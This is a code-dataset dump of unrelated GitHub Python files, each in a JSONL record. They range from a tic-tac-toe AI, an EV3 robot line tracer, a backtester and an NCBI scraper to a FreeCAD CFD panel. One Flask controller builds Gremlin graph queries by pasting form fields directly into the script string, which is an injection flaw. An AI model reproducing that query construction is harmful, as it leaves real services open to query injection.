Cleanair_5G_Config())\n logging.debug('Checked AireOS parsing dictionaries test results for correct parsing')","repo_name":"consulttelecom/cisco-wlc-pythonizer","sub_path":"source/aireos_dicts_classes.py","file_name":"aireos_dicts_classes.py","file_ext":"py","file_size_in_byte":198089,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"6"} +{"seq_id":"661397129","text":"\"\"\"\nTic tac toe question 2 implementation\n\"\"\"\nimport itertools\n\nfrom problems.tic_tac_toe.base import _Board\n\n\nclass BoardQ2(_Board):\n \"\"\"\n Question 2 board implementation\n \"\"\"\n\n def move_comp(self):\n \"\"\"\n Calculates and moves computer\n \"\"\"\n if self.turn < 3:\n self.computer.append(self.get_random_blank())\n return\n\n for move_pair in itertools.chain(itertools.combinations(self.computer, 2), itertools.combinations(self.player, 2)):\n pair_sum_dif = 15 - sum(map(self.board.__getitem__, move_pair))\n if 0 < pair_sum_dif < 10:\n ind = self.board.index(pair_sum_dif)\n if ind not in self.computer and ind not in self.player:\n self.computer.append(ind)\n return\n 
self.computer.append(self.get_random_blank())\n","repo_name":"zeerorg/AI-py","sub_path":"problems/tic_tac_toe/ques2.py","file_name":"ques2.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"73666987068","text":"from flask_restful import Resource\nfrom flask import request\nimport requests\nfrom requests.exceptions import ConnectionError\n\n\nclass Add(Resource):\n def post(self):\n r = request\n user_id = r.form['user_id']\n dub_id = r.form['dub_id']\n emo_id = r.form['emo_id']\n\n db_proxy = DbProxy()\n db_proxy.add(\"e = g.addEdge('belongs', g.V(%s), g.V(%s)); \" % (user_id, dub_id))\n db_proxy.add(\"e.setProperty('emo_id', %s)\" % emo_id)\n try:\n response = db_proxy.send()\n except ConnectionError:\n # Flask-RESTful handlers return (data, status_code), not (status_code, data)\n return \"db abruption\", 500\n if response.status_code == 500:\n return response.json()['message'], 400\n return \"ok\", response.status_code\n\n\nclass Singleton(type):\n def __init__(cls, name, bases, dict):\n super(Singleton, cls).__init__(name, bases, dict)\n cls.instance = None\n\n def __call__(cls, *args, **kw):\n if cls.instance is None:\n cls.instance = super(Singleton, cls).__call__(*args, **kw)\n return cls.instance\n\n\nclass DbProxy(object, metaclass=Singleton):\n # Python 3 metaclass syntax; the old __metaclass__ class attribute is ignored in Python 3\n\n def __init__(self):\n self.script = \"\"\n\n def add(self, line):\n self.script += line\n\n def send(self):\n self.script = '{\"gremlin\": \"%s\"}' % self.script\n try:\n response = requests.post('http://ec2-52-50-189-192.eu-west-1.compute.amazonaws.com:8182', data=self.script)\n except ConnectionError as e:\n raise e\n self.script = ''\n return response\n","repo_name":"gunkow/smash","sub_path":"app/api/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"2292747696","text":"#!/usr/bin/env pybricks-micropython\r\nimport sys\r\nsys.path.append(\"./\")\r\n\r\n# The pybricks reference is here: https://docs.pybricks.com/en/stable/index.html\r\nfrom pybricks.hubs import EV3Brick\r\nfrom pybricks.ev3devices import (Motor, TouchSensor, ColorSensor,\r\n InfraredSensor, UltrasonicSensor, GyroSensor)\r\nfrom pybricks.parameters import Port, Stop, Direction, Button, Color\r\nfrom pybricks.tools import wait, StopWatch, DataLog\r\nfrom pybricks.robotics import DriveBase\r\nfrom pybricks.media.ev3dev import SoundFile, ImageFile\r\nfrom color import RGBColor\r\n\r\n# Initialize the EV3-specific devices\r\nleftMotor = Motor(Port.C)\r\nrightMotor = Motor(Port.B)\r\nsonicSensor = UltrasonicSensor(Port.S4)\r\n\r\nclass LineTraceCar():\r\n \"\"\"\r\n Class that performs line tracing and garage parking\r\n \"\"\"\r\n SPEED = [240, 80] # normal\r\n SPEED2 = [120, 60] # slow\r\n SPEED3 = [240, 180] # fast\r\n\r\n FLAG_NORMAL = 0\r\n FLAG_GREEN = 1\r\n FLAG_BLUE = 2\r\n\r\n def waitStart(self, dist_min_mm, dist_max_mm):\r\n \"\"\"Loop forever while an object keeps being detected between dist_min and dist_max\"\"\"\r\n while True:\r\n if not self.__isDetectObject(dist_min_mm, dist_max_mm):\r\n break\r\n # end of while\r\n\r\n def trace(self):\r\n \"\"\"Main line-tracing routine\"\"\"\r\n # Initialize the RGBColor class\r\n rgbColor = RGBColor()\r\n self.__initMotor()\r\n\r\n flag = self.FLAG_NORMAL\r\n speed = self.SPEED\r\n\r\n # Drive while tracing the line\r\n while True:\r\n # Read and classify the color\r\n gotColor = rgbColor.getColor()\r\n\r\n if gotColor is Color.BLACK:\r\n if flag == self.FLAG_GREEN:\r\n # If black is detected after green, take the 90-degree corner\r\n self.__turnLastCurve()\r\n flag = self.FLAG_NORMAL\r\n # The rest of the course is straight, so switch to the high-speed setting\r\n speed = self.SPEED3\r\n elif flag == self.FLAG_BLUE:\r\n # When black follows blue, slow down to line the robot up for garage parking\r\n speed = self.SPEED2\r\n self.__run(speed[1], speed[0])\r\n flag = self.FLAG_NORMAL\r\n\r\n else:\r\n # Turn right\r\n self.__run(speed[1], speed[0])\r\n\r\n elif gotColor is Color.WHITE: # white\r\n # Turn left\r\n self.__run(speed[0], speed[1])\r\n\r\n elif gotColor is Color.GREEN: # green\r\n self.__run(speed[1], speed[0])\r\n flag = self.FLAG_GREEN\r\n\r\n elif gotColor is Color.BLUE: # blue\r\n self.__run(speed[1], speed[0])\r\n flag = self.FLAG_BLUE\r\n\r\n elif gotColor is Color.YELLOW:\r\n break\r\n\r\n else:\r\n # Any other color besides white also turns right\r\n self.__run(speed[1], speed[0])\r\n # end of while\r\n\r\n # Stop the motors\r\n leftMotor.stop()\r\n rightMotor.stop()\r\n print(\"trace MotorStop\")\r\n\r\n def garageIn(self):\r\n \"\"\"\r\n Perform the garage parking\r\n \"\"\"\r\n # Go straight a little\r\n self.__initMotor()\r\n \r\n speed = self.__calcDegree(10)\r\n leftMotor.run_angle(speed, speed, wait=False)\r\n rightMotor.run_angle(speed, speed, wait=True)\r\n\r\n # Turn 90 degrees to the left\r\n self.__turn(-90)\r\n\r\n # Move forward 20 cm\r\n speed = self.__calcDegree(20)\r\n leftMotor.run_angle(speed, speed, wait=False)\r\n rightMotor.run_angle(speed, speed, wait=True)\r\n\r\n leftMotor.brake()\r\n rightMotor.brake()\r\n print(\"garageIn() MotorStop\")\r\n\r\n def __initMotor(self):\r\n leftMotor.brake()\r\n rightMotor.brake()\r\n\r\n leftMotor.reset_angle(0)\r\n rightMotor.reset_angle(0)\r\n\r\n def __run(self, l_motor_speed, r_motor_speed):\r\n \"\"\"\r\n Run the motors. The arguments are the angular velocities (deg/s) of the left and right motors.\r\n \"\"\"\r\n if l_motor_speed == 0:\r\n # TODO: hold() might also work\r\n leftMotor.stop()\r\n else:\r\n leftMotor.run(l_motor_speed)\r\n\r\n if r_motor_speed == 0:\r\n rightMotor.stop()\r\n else:\r\n rightMotor.run(r_motor_speed)\r\n\r\n def __turnLastCurve(self):\r\n \"\"\"Control function called when black is detected after green; takes the 90-degree curve\"\"\"\r\n # Go straight 4 cm\r\n speed = self.__calcDegree(4)\r\n leftMotor.run_angle(speed * 2, speed, wait=False)\r\n rightMotor.run_angle(speed * 2, speed, wait=True)\r\n\r\n self.__turn(90)\r\n\r\n def __calcDegree(self, run_distance_cm):\r\n \"\"\"Compute the motor angle required for a given travel distance\"\"\"\r\n # Travel distance y = 5.6 (cm, tire diameter) * 3.14 * deg / 360, so rearrange this to compute deg\r\n return run_distance_cm * 20.47\r\n\r\n def __turn(self, deg):\r\n \"\"\"Turn by the given angle: positive turns right, negative turns left\"\"\"\r\n # Speed needed to pivot-turn by the given angle in 1 s\r\n # The robot's tread (turning radius) is about 10 cm, so the tire travel distance is 20 * 3.14 * deg / 360.\r\n # Applying the travel-distance formula y = 5.6 (cm, tire diameter) * 3.14 * deg_s / 360 to this gives 20/5.6 * deg\r\n\r\n #speed = 3.6 * deg\r\n speed = 4.3 * deg # the robot cannot finish the turn at higher speeds, so raise the coefficient\r\n\r\n if deg > 0:\r\n # Positive: turn right = run the left motor\r\n leftMotor.run_angle(speed, speed, wait=True)\r\n rightMotor.hold()\r\n\r\n else:\r\n # Negative: turn left = run the right motor; deg is negative, so negate it\r\n leftMotor.hold()\r\n rightMotor.run_angle(-speed, -speed, wait=True)\r\n\r\n def __isDetectObject(self, dist_min, dist_max):\r\n \"\"\"Return True if an object is detected within the given range\"\"\"\r\n dist = sonicSensor.distance()\r\n if (dist_min < dist and dist < dist_max):\r\n return True\r\n return False\r\n\r\nif __name__ == \"__main__\":\r\n car = LineTraceCar()\r\n\r\n # startup handling\r\n car.waitStart(50, 200)\r\n\r\n # Start line tracing\r\n car.trace()\r\n\r\n # Park the car\r\n car.garageIn()\r\n","repo_name":"dnaka/EV3_sample","sub_path":"step4_main.py","file_name":"step4_main.py","file_ext":"py","file_size_in_byte":5699,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"18801406817","text":"from pymilvus import DataType\nfrom milvus_benchmark.runners.locust_user import locust_executor\nfrom milvus_benchmark.client import MilvusClient\n\n\nif __name__ == \"__main__\":\n connection_type = \"single\"\n host = \"127.0.0.1\"\n port = 19530\n collection_name = \"sift_1m_128_l2\"\n run_params = {\"tasks\": {\"insert\": 1}, \"clients_num\": 10, \"spawn_rate\": 2, \"during_time\": 3600}\n dim = 128\n m = MilvusClient(host=host, port=port, collection_name=collection_name)\n m.create_collection(dim, data_type=DataType.FLOAT_VECTOR, auto_id=False, 
other_fields=None)\n locust_executor(host, port, collection_name, run_params=run_params)\n","repo_name":"milvus-io/milvus","sub_path":"tests/benchmark/milvus_benchmark/tests/locust_user_test.py","file_name":"locust_user_test.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":24190,"dataset":"github-code","pt":"6"} +{"seq_id":"70078688508","text":"import yfinance as module_yf\nimport pandas as module_pd\nimport numpy as module_np\nimport collections as module_cl\n\n\n\ndef function_tsig(\n list_indicator\n):\n\n vector_indicator = module_np.array(\n object = list_indicator\n )\n\n vector_non_neg = module_np.maximum(\n vector_indicator,\n 0\n )\n\n vector_sign = module_np.sign(\n vector_non_neg\n )\n\n list_sign = list(\n vector_sign\n )\n\n return list_sign\n\n\ndef function_list_shift(\n list_input,\n float_fill\n):\n\n deque_input = module_cl.deque(\n iterable = list_input\n )\n\n deque_input.pop()\n\n deque_input.appendleft(\n float_fill\n )\n\n return list(\n deque_input\n )\n\ndef function_action(\n list_sign\n):\n\n list_shift = function_list_shift(\n list_input = list_sign,\n float_fill = 0\n )\n\n list_output = list(\n module_np.array(\n list_sign\n ) - \n module_np.array(\n list_shift\n )\n )\n\n return list_output\n\n\ndef function_backtester(\n list_prices,\n list_indicator,\n float_ratio\n):\n\n '''\n Backtester for either a long or short position.\n\n Long positions are tested with positive 'float_ratio'.\n\n Short positions are tested with negative 'float_ratio'.\n '''\n\n list_tsig = function_tsig(\n list_indicator = list_indicator\n )\n\n list_action = function_action(\n list_sign = list_tsig\n )\n\n list_alpha = []\n\n int_length = len(list_prices)\n\n for int_i in range(0, int_length):\n\n if list_action[int_i] == 1:\n\n list_alpha.append(1)\n float_inprice = list_prices[int_i]\n\n if list_action[int_i] == 0:\n\n if list_tsig[int_i] == 1:\n\n list_alpha.append(\n (float_inprice + (list_prices[int_i] - float_inprice) * float_ratio) / \n (float_inprice + (list_prices[int_i - 1] - float_inprice) * float_ratio)\n )\n\n if list_tsig[int_i] == 0:\n\n list_alpha.append(1)\n\n if list_action[int_i] == -1:\n\n list_alpha.append(\n (float_inprice + (list_prices[int_i] - float_inprice) * float_ratio) / \n (float_inprice + (list_prices[int_i - 1] - float_inprice) * float_ratio)\n )\n\n return list_alpha\n \n\n\n\ndef function_heikin_ashi_gen(\n list_values,\n float_initial,\n float_strength\n):\n\n list_output = [\n float_initial\n ]\n\n int_length = len(\n list_values\n )\n\n for int_i in range(0, int_length - 1):\n\n float_new_ha = list_output[int_i] * float_strength + list_values[int_i + 1] - list_values[int_i]\n\n list_output.append(\n float_new_ha\n )\n\n return list_output\n","repo_name":"Lepecin/wcs_bot_backtester_project","sub_path":"6th_week_v1/code/tb_custompack.py","file_name":"tb_custompack.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"37828583864","text":"\"\"\"Main app initialization.\"\"\"\nfrom fastapi import FastAPI\nfrom starlette.middleware.cors import CORSMiddleware\n\nfrom app.api import api_router\nfrom app.core.config import settings\nfrom app.db import database\n\n\napp = FastAPI(\n title=settings.project_name,\n openapi_url=f\"{settings.api_path}/openapi.json\",\n docs_url=f\"{settings.api_path}/docs/\",\n redoc_url=None,\n)\n\napp.state.database = database\n\n# Set all CORS enabled origins\nif 
settings.backend_cors_origins:\n app.add_middleware(\n CORSMiddleware,\n allow_origins=[str(origin) for origin in settings.backend_cors_origins],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n )\n\napp.include_router(api_router, prefix=settings.api_path)\n\n\n@app.on_event(\"startup\")\nasync def startup() -> None:\n \"\"\"Run actions on app startup.\n\n Ensure database is connected\n \"\"\"\n database_ = app.state.database\n if not database_.is_connected:\n await database_.connect()\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown() -> None:\n \"\"\"Run actions on app shutdown.\n\n Ensure database is disconnected\n \"\"\"\n database_ = app.state.database\n if database_.is_connected:\n await database_.disconnect()\n","repo_name":"dbatten5/cookiecutter-fastapi-react-psql","sub_path":"{{cookiecutter.project_name}}/backend/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"}
{"seq_id":"37226182571","text":"import os\r\nimport sqlite3\r\n\r\nlib = sqlite3.connect(os.path.join('database', 'data.db'))\r\n\r\ncursor = lib.cursor()\r\n\r\ncursor.execute(''' CREATE TABLE user_group (group_id text, alias text, authority integer) ''')\r\n\r\ncursor.execute(\"INSERT INTO user_group VALUES ('250253824', 'nsfz_acg', 2)\")\r\n\r\nlib.commit()\r\nlib.close()","repo_name":"Ntimesp/AkinaChann","sub_path":"database/init_group_db.py","file_name":"init_group_db.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"1354889961","text":"total = int(input())\ndict1 = dict()\nfor i in range(total):\n input_data = input().split(\" \")\n if(dict1.get(input_data[0],0) != 0):\n dict1[input_data[0]] += 1\n else:\n dict1[input_data[0]] = 1\nlist1 = list(dict1.items())\nfor i in range(len(list1) - 1,0,-1):\n for ii in range(0,i):\n # compare the full names, not just their first characters\n if(list1[ii][0] > list1[ii + 1][0]):\n tmp = list1[ii]\n list1[ii] = list1[ii + 1]\n list1[ii + 1] = tmp\nfor i in list1:\n print(i[0],i[1])","repo_name":"explosion3975/CPE","sub_path":"UVA10420.py","file_name":"UVA10420.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"22202901102","text":"import warnings; warnings.filterwarnings(\"ignore\")\nfrom tqdm import tqdm\nimport pandas as pd\nimport requests\nimport bs4\n# =============================================================================================== #\nncbi_link = \"https://eutils.ncbi.nlm.nih.gov/entrez/eutils/esummary.fcgi?db=gene&id=\"\n# =============================================================================================== #\ngenelist_link = \"https://www.genenames.org/cgi-bin/download/custom?col=gd_app_sym&col=md_eg_id&status=Approved&status=Entry%20Withdrawn&hgnc_dbtag=on&limit=2000&order_by=gd_app_sym_sort&format=text&submit=submit\"\n# genelist_link = \"https://www.genenames.org/cgi-bin/download/custom?col=gd_app_sym&col=md_eg_id&status=Approved&status=Entry%20Withdrawn&hgnc_dbtag=on&order_by=gd_app_sym_sort&format=text&submit=submit\"\n# =============================================================================================== #\ndf_genelist = pd.read_csv(genelist_link, header=0, sep=\"\\t\", error_bad_lines=False)\n# =============================================================================================== #\ngenelist = df_genelist['NCBI Gene 
ID(supplied by NCBI)'].fillna(0).astype(int).tolist()\ngenelist = [x for x in genelist if str(x) != 'nan']\ngenelist = [x for x in genelist if str(x) != '0']\n# print(genelist)\n# =============================================================================================== #\nbs_data = []\nbs_error = []\n# =============================================================================================== #\nfor i in tqdm(genelist, desc='Progress: '):\n try:\n url_link = str(ncbi_link + str(i))\n r = requests.get(url_link)\n soup = bs4.BeautifulSoup(r.content, 'xml')\n name_bs = soup.find(\"Name\").text\n description_bs = soup.find(\"Description\").text\n species_bs = soup.find(\"ScientificName\").text\n aliases_bs = soup.find(\"OtherAliases\").text\n summary_bs = soup.find(\"Summary\").text\n #print(i, '\\t\\t\\t', name_bs, '\\t\\t\\t', species_bs, '\\t\\t\\t', description_bs)\n bs_data.append({'UID': i, 'ScientificName': species_bs, 'Description': description_bs,\n 'Name': name_bs, 'Summary': summary_bs})\n\n except AttributeError:\n bs_error.append({'UID': i, 'Error': 'Error'})\n bs_data.append({'UID': i, 'ScientificName': \"Error\", 'Description': \"Error\",\n 'Name': \"Error\",'Summary': \"Error\"})\n# =============================================================================================== #\ndf_bs = pd.DataFrame(data=bs_data, columns=['UID','ScientificName','Name','Description','Summary'])\ndf_bs.rename(columns={'Name':'GeneSymbol','Summary':'GeneSummary'}, inplace=True)\ndf_error = pd.DataFrame(data=bs_error, columns=['UID','Error'])\n# =============================================================================================== #\ndf_bs.to_csv('./OutputData/NCBI_Eutils_v03_output.csv', index=False, sep='\\t')\ndf_error.to_csv('./OutputData/NCBI_Eutils_v03_errorlog.csv', index=False, sep='\\t')\n# =============================================================================================== #","repo_name":"AlbertoBejarano/BioInformatics","sub_path":"NCBI_Eutils_v03.py","file_name":"NCBI_Eutils_v03.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"18120422486","text":"l = [\"washington\", \"test\", \"key\", \"random\"]\n\n\n## Approach 1\nlong_str_len = len(max(l,key=len))\ntemp_l = []\n\nfor i in range(len(l)):\n if len(l[i]) != long_str_len:\n diff = long_str_len - len(l[i])\n var = '*' * diff\n var = var + l[i]\n temp_l.append('|'.join(var))\n else:\n temp_l.append('|'.join(l[i]))\nfor row in temp_l:\n print(row)\n\n\n## Approach 2\nmyArray = l\nmx = len(max(myArray, key= len ))\nmn = len(min(myArray,key = len))\ntemp_list = []\nfor i in myArray:\n if len(i)<=mx and len(i)>mn:\n temp_list.append(i)\n elif len(i)== mn:\n temp_list.append(i)\n break\nfor row in temp_list:\n print(\"|\".join(\"{:*>{mx}}\".format(row,mx=mx)))\n\n\n## One Liner Approach\n\nlong_str_len = len(max(l,key=len))\nmatrix = ['|'.join(('*' * (long_str_len - len(l[i]))) + l[i]) for i in range(len(l))]\nfor row in matrix:\n print(row)\n","repo_name":"devcoder007/Pad-and-Align-Python-Strin","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"35587318793","text":"import tflearn\n\n\nclass LstmRnn:\n def __init__(self, char_idx, seq_max_len=25, checkpoint_path=None, default_seed=None):\n g = tflearn.input_data([None, seq_max_len, len(char_idx)])\n g = 
tflearn.lstm(g, 512, return_seq=True)\n g = tflearn.dropout(g, 0.5)\n g = tflearn.lstm(g, 512, return_seq=True)\n g = tflearn.dropout(g, 0.5)\n g = tflearn.lstm(g, 512)\n g = tflearn.dropout(g, 0.5)\n g = tflearn.fully_connected(g, len(char_idx), activation='softmax')\n g = tflearn.regression(g, optimizer='adam', loss='categorical_crossentropy', learning_rate=0.001)\n\n self.model = tflearn.SequenceGenerator(\n g, dictionary=char_idx,\n clip_gradients=5.0,\n checkpoint_path=checkpoint_path\n )\n\n self.default_seed = default_seed if default_seed else \"life in the hood\"\n\n def train(self, data, params=dict()):\n \"\"\"\n by default run for one epochs over the training data in batches of 128\n \"\"\"\n epochs = 1 if not (\"epochs\" in params) else params[\"epochs\"]\n batch_size = 128 if not (\"batch_size\" in params) else params[\"batch_size\"]\n\n X = data[\"X\"]\n Y = data[\"Y\"]\n self.model.fit(\n X, Y,\n validation_set=0.1,\n batch_size=batch_size,\n n_epoch=epochs\n )\n\n def spit(self, include_meta_data=False, seq_len=200, temp=1.0, seed=None, meta_data=None):\n seed = seed if seed else self.default_seed\n output = \"\"\n if include_meta_data:\n if not meta_data:\n raise TypeError(\"model.spit() called with include_meta_data set to True, but no metadata provided\")\n\n output += self.model.generate(seq_len, temperature=temp, seq_seed=seed)\n return output\n\n def get_state(self):\n return self.model\n\n def load_state(self, model):\n self.model = model\n","repo_name":"animate-object/r-prime","sub_path":"app/src/core/models/lstm_rnn.py","file_name":"lstm_rnn.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27958355047","text":"import os\nimport os.path\nimport FreeCAD\nif FreeCAD.GuiUp:\n import FreeCADGui\nfrom CfdOF import CfdTools\nfrom CfdOF.CfdTools import getQuantity, setQuantity, storeIfChanged\n\n\nRANS_MODELS = ['kOmegaSST', 'kEpsilon', 'SpalartAllmaras', 'kOmegaSSTLM']\nDES_MODELS = ['kOmegaSSTDES', 'kOmegaSSTDDES', 'kOmegaSSTIDDES', 'SpalartAllmarasDES', 'SpalartAllmarasDDES',\n 'SpalartAllmarasIDDES']\nLES_MODELS = ['kEqn', 'Smagorinsky', 'WALE']\n\n\nclass TaskPanelCfdPhysicsSelection:\n def __init__(self, obj):\n FreeCADGui.Selection.clearSelection()\n self.sel_server = None\n self.obj = obj\n self.form = FreeCADGui.PySideUic.loadUi(os.path.join(CfdTools.getModulePath(), 'Gui', \"TaskPanelPhysics.ui\"))\n\n self.form.radioButtonSteady.toggled.connect(self.updateUI)\n self.form.radioButtonTransient.toggled.connect(self.updateUI)\n self.form.radioButtonSinglePhase.toggled.connect(self.updateUI)\n self.form.radioButtonFreeSurface.toggled.connect(self.updateUI)\n self.form.checkBoxIsothermal.stateChanged.connect(self.updateUI)\n self.form.viscousCheckBox.stateChanged.connect(self.updateUI)\n self.form.srfCheckBox.stateChanged.connect(self.updateUI)\n self.form.radioButtonLaminar.toggled.connect(self.updateUI)\n self.form.radioButtonRANS.toggled.connect(self.updateUI)\n self.form.radioButtonDES.toggled.connect(self.updateUI)\n self.form.radioButtonLES.toggled.connect(self.updateUI)\n\n self.load()\n\n def load(self):\n\n # Time\n if self.obj.Time == 'Steady':\n self.form.radioButtonSteady.toggle()\n elif self.obj.Time == 'Transient':\n self.form.radioButtonTransient.toggle()\n\n # Phase\n if self.obj.Phase == 'Single':\n self.form.radioButtonSinglePhase.toggle()\n elif self.obj.Phase == 'FreeSurface':\n self.form.radioButtonFreeSurface.toggle()\n\n # Flow\n 
self.form.checkBoxIsothermal.setChecked(self.obj.Flow == 'Isothermal')\n self.form.checkBoxHighMach.setChecked(self.obj.Flow == 'HighMachCompressible')\n\n # Turbulence\n if self.obj.Turbulence == 'Inviscid':\n self.form.viscousCheckBox.setChecked(False)\n self.form.radioButtonLaminar.toggle()\n if self.obj.Turbulence == 'Laminar':\n self.form.viscousCheckBox.setChecked(True)\n self.form.radioButtonLaminar.toggle()\n elif self.obj.Turbulence == 'RANS':\n self.form.viscousCheckBox.setChecked(True)\n self.form.radioButtonRANS.toggle()\n elif self.obj.Turbulence == 'DES':\n self.form.viscousCheckBox.setChecked(True)\n self.form.radioButtonDES.toggle()\n elif self.obj.Turbulence == 'LES':\n self.form.viscousCheckBox.setChecked(True)\n self.form.radioButtonLES.toggle()\n\n # Gravity\n setQuantity(self.form.gx, self.obj.gx)\n setQuantity(self.form.gy, self.obj.gy)\n setQuantity(self.form.gz, self.obj.gz)\n\n # SRF model\n self.form.srfCheckBox.setChecked(self.obj.SRFModelEnabled)\n\n setQuantity(self.form.inputSRFCoRx, self.obj.SRFModelCoR.x)\n setQuantity(self.form.inputSRFCoRy, self.obj.SRFModelCoR.y)\n setQuantity(self.form.inputSRFCoRz, self.obj.SRFModelCoR.z)\n\n setQuantity(self.form.inputSRFAxisx, self.obj.SRFModelAxis.x)\n setQuantity(self.form.inputSRFAxisy, self.obj.SRFModelAxis.y)\n setQuantity(self.form.inputSRFAxisz, self.obj.SRFModelAxis.z)\n\n setQuantity(self.form.inputSRFRPM, self.obj.SRFModelRPM)\n\n self.updateUI()\n\n def updateUI(self):\n self.form.TimeFrame.setVisible(True)\n self.form.FlowFrame.setVisible(True)\n self.form.turbulenceFrame.setVisible(True)\n\n # Steady / transient\n if self.form.radioButtonSteady.isChecked():\n self.form.radioButtonFreeSurface.setEnabled(False)\n if self.form.radioButtonDES.isChecked() or self.form.radioButtonLES.isChecked():\n self.form.radioButtonRANS.toggle()\n self.form.radioButtonDES.setEnabled(False)\n self.form.radioButtonLES.setEnabled(False)\n if self.form.radioButtonFreeSurface.isChecked():\n self.form.radioButtonSinglePhase.toggle()\n else:\n self.form.radioButtonFreeSurface.setEnabled(True)\n self.form.radioButtonDES.setEnabled(True)\n self.form.radioButtonLES.setEnabled(True)\n\n # Gravity\n self.form.gravityFrame.setEnabled(\n self.form.radioButtonFreeSurface.isChecked() or\n (not self.form.checkBoxIsothermal.isChecked() and not self.form.checkBoxHighMach.isChecked()))\n\n # SRF model\n srf_capable = (self.form.radioButtonSteady.isChecked() and self.form.checkBoxIsothermal.isChecked())\n srf_should_be_unchecked = ((not self.form.checkBoxIsothermal.isChecked()) \n or self.form.radioButtonTransient.isChecked()\n or self.form.radioButtonFreeSurface.isChecked())\n self.form.srfCheckBox.setEnabled(srf_capable)\n if srf_should_be_unchecked:\n self.form.srfCheckBox.setChecked(False)\n self.form.srfFrame.setEnabled(self.form.srfCheckBox.isChecked())\n\n # Free surface\n if self.form.radioButtonFreeSurface.isChecked():\n self.form.checkBoxIsothermal.setChecked(True)\n self.form.checkBoxIsothermal.setEnabled(False)\n else:\n self.form.checkBoxIsothermal.setEnabled(True)\n\n # High Mach capability\n self.form.checkBoxHighMach.setEnabled(not self.form.checkBoxIsothermal.isChecked())\n if self.form.checkBoxIsothermal.isChecked():\n self.form.checkBoxHighMach.setChecked(False)\n\n # Viscous \n if self.form.viscousCheckBox.isChecked():\n self.form.turbulenceFrame.setVisible(True)\n # RANS\n if self.form.radioButtonRANS.isChecked():\n self.form.turbulenceComboBox.clear()\n self.form.turbulenceComboBox.addItems(RANS_MODELS)\n ti = 
CfdTools.indexOrDefault(RANS_MODELS, self.obj.TurbulenceModel, 0)\n self.form.turbulenceComboBox.setCurrentIndex(ti)\n self.form.turbulenceModelFrame.setVisible(True)\n #DES\n elif self.form.radioButtonDES.isChecked():\n self.form.turbulenceComboBox.clear()\n self.form.turbulenceComboBox.addItems(DES_MODELS)\n ti = CfdTools.indexOrDefault(DES_MODELS, self.obj.TurbulenceModel, 0)\n self.form.turbulenceComboBox.setCurrentIndex(ti)\n self.form.turbulenceModelFrame.setVisible(True)\n # LES\n elif self.form.radioButtonLES.isChecked():\n self.form.turbulenceComboBox.clear()\n self.form.turbulenceComboBox.addItems(LES_MODELS)\n ti = CfdTools.indexOrDefault(LES_MODELS, self.obj.TurbulenceModel, 0)\n self.form.turbulenceComboBox.setCurrentIndex(ti)\n self.form.turbulenceModelFrame.setVisible(True)\n else:\n self.form.turbulenceModelFrame.setVisible(False)\n self.form.turbulenceComboBox.clear()\n else:\n self.form.turbulenceFrame.setVisible(False)\n self.form.turbulenceModelFrame.setVisible(False)\n\n def accept(self):\n doc = FreeCADGui.getDocument(self.obj.Document)\n doc.resetEdit()\n\n if self.form.radioButtonSteady.isChecked():\n storeIfChanged(self.obj, 'Time', 'Steady')\n elif self.form.radioButtonTransient.isChecked():\n storeIfChanged(self.obj, 'Time', 'Transient')\n\n if self.form.radioButtonSinglePhase.isChecked():\n storeIfChanged(self.obj, 'Phase', 'Single')\n elif self.form.radioButtonFreeSurface.isChecked():\n storeIfChanged(self.obj, 'Phase', 'FreeSurface')\n\n if self.form.checkBoxIsothermal.isChecked():\n storeIfChanged(self.obj, 'Flow', 'Isothermal')\n elif not self.form.checkBoxIsothermal.isChecked():\n if self.form.checkBoxHighMach.isChecked():\n storeIfChanged(self.obj, 'Flow', 'HighMachCompressible')\n else:\n storeIfChanged(self.obj, 'Flow', 'NonIsothermal')\n\n if self.form.viscousCheckBox.isChecked():\n if self.form.radioButtonLaminar.isChecked():\n storeIfChanged(self.obj, 'Turbulence', 'Laminar')\n else:\n if self.form.radioButtonRANS.isChecked():\n storeIfChanged(self.obj, 'Turbulence', 'RANS')\n elif self.form.radioButtonDES.isChecked():\n storeIfChanged(self.obj, 'Turbulence', 'DES')\n elif self.form.radioButtonLES.isChecked():\n storeIfChanged(self.obj, 'Turbulence', 'LES')\n storeIfChanged(self.obj, 'TurbulenceModel', self.form.turbulenceComboBox.currentText())\n else:\n storeIfChanged(self.obj, 'Turbulence', 'Inviscid')\n\n storeIfChanged(self.obj, 'gx', getQuantity(self.form.gx))\n storeIfChanged(self.obj, 'gy', getQuantity(self.form.gy))\n storeIfChanged(self.obj, 'gz', getQuantity(self.form.gz))\n\n if self.form.srfCheckBox.isChecked():\n storeIfChanged(self.obj, 'SRFModelEnabled', self.form.srfCheckBox.isChecked())\n storeIfChanged(self.obj, 'SRFModelRPM', self.form.inputSRFRPM.text())\n centre_of_rotation = FreeCAD.Vector(\n self.form.inputSRFCoRx.property(\"quantity\").Value,\n 